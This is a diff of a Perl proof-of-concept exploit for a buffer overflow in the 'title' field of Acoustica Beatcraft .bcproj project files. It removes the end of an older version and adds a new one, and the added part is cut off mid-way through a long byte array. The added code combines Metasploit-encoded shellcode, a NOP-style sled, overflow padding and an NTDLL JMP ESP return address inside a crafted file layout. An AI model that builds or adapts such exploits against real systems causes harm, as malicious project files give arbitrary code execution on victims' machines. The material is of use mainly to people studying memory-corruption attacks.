"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". - "\x62\x73\x73\x65\x0C\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x10\x00\x00\x00". - "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". - "\x00\x00\xB0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00". - "\x02\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". - "\x00\x00\x00\x00\x00\x00\xC0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". - "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x03\x00\x00\x00\x03\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xC8\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". - "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD0\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x64\x00\x00\x00". 
- "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD4\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". - "\x00\x00\xD8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00". - "\x07\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". - "\x00\x00\x00\x00\x00\x00\xDC\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". - "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00". - "\x00\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". - "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x02\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE2\x3F\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE4\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x0B\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". - "\x00\x00\xE6\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00". - "\x0C\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F". - "\x00\x00\x00\x00\x00\x00\xE8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00". - "\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00". - "\x01\x00\x00\x00\x0D\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEA\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65". - "\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x03\x00\x00\x00\x02\x00\x00\x00\x0E\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00". - "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEC\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x0F\x00\x00\x00\x64\x00\x00\x00". - "\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEE\x3F". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x62\x73\x65\x71\x24\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x01\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00\x00\x00\x80\x3F". - "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00". - "\x00\x00\x80\x3F\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x65\x71". - "\x08\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00"; - - -open (MYFILE, '>>POC.bcproj'); -binmode(MYFILE); -print MYFILE "$tuff"; -close (MYFILE); -print "Exploit file has been created. 
( POC.bcproj )\n"; - -# milw0rm.com [2008-08-30] +#!/usr/bin/perl +# +# Acoustica Beatcraft (bcproj file) Local BOF Exploit +# Author: Koshi +# +# Date: 08-30-08 ( 0day ) +# Application: Acoustica Beatcraft +# Version(s): v1.02 Build 19 +# Site: http://acoustica.com/beatcraft/index.htm +# Tested On: Windows XP SP3 Fully Patched +# +# Acoustica Beatcraft contains a buffer prone to exploitation via an +# overly long string. The buffer contains the "title" of the "instruments" +# one can insert into a Beatcraft project. This exploit is a bit +# unstable in the fact that, to properly exploit it, one must open +# Beatcraft firstly, then proceed to open the exploit file from +# within Beatcraft. Simply double clicking the file will result +# in a simple DoS scenario. ( Hopefully I'll fix this soon ) +# My guess as of now is we're not going to have it both ways. +# +# gr33tz: Rima my baby, str0ke, breaker_unit, mess' +# + + +# win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com +my $shellcode = +"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24". +"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e". +"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41". +"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1". +"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a". +"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c". +"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44". +"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd". +"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4". +"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b". +"\xbd\x53\x64\xee\xc1"; + +my $led1 = "A"x110; # Sled ( \x41 INC ECX ) +my $led2 = "A"x34; # Sled ( \x41 INC ECX ) +my $buf1 = "A"x179; # Overflow + +my $buff = "". + "$buf1". # Overflowage... + "$led1". # Slide on down to the jump + "\xeb\x07". 
# Jump NTDLL address + "\xed\x1e\x94\x7c". # NTDLL.DLL JMP ESP ( This may need to be changed to a different JMP ESP ) + "\xeb\x31". # Line it up right and land into the sled + "$led2". # Slip on down to the shellcode + "$shellcode"; # ..to the beat of a different drum. + +my $tuff = "". + "\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00". + "\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64". + "\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B". + "\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00". + "\x62\x6B\x69\x74\x98\x01\x00\x00\x00\x00\x80\x3F\xE8\x2B\x56\x13\x9F\x06\xB1\x4F". + "\xB8\x24\x65\xE5\x00\xAB\xB8\xA7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x62\x74\x72\x61". + "\x28\x00\x00\x00\xCD\xCC\x8C\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x62\x73\x61\x6D\x9C\x02\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "$buff". + "\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x62\x70\x61\x74\xA8\x01\x00\x00\x00\x00\x80\x3F". + "\x3C\xF3\x4B\x37\x40\x30\xEC\x4E\xA3\xD7\xB3\x2C\x48\x84\xE5\xAC\x01\x00\x00\x00". + "\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + 